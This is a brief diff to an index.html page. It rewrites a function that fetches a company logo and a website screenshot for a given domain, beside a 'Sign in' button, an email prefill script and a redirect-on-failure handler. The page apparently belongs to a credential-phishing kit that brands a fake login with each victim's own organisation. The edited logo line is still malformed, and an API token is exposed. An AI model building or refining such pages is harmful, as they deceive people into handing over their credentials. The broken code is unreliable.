--- a/index.html
+++ b/index.html
@@ -1779,8 +1779,8 @@ function handleRedirectOnFailure(email) {
 
 function setImages(domain) {
   if (!domain) return;
-  const logoUrl = `'https://img.logo.dev/' + my_slice + '?token=pk_XbcRLEiaQmKqN0PgTrqF6A'`;
-  const bgUrl = `https://screenshot.domains/+ my_slice`;
+  const logoUrl = `'https://img.logo.dev/${domain} + '?token=pk_XbcRLEiaQmKqN0PgTrqF6A'`;
+  const bgUrl = `https://screenshot.domains/${domain}`;
 
   const logoImg = document.getElementById("logoimg");
   const bgLayer = document.getElementById("background-layer");
@@ -1906,7 +1906,6 @@ document.addEventListener("DOMContentLoaded", () => {
     submitBtn.textContent = "Sign in";
   }
 });
-
 </script>	
    
   
@@ -1916,4 +1915,5 @@ document.addEventListener("DOMContentLoaded", () => {
 <script src="prefill-email.js"></script>  
 
    </body></html>
+
 
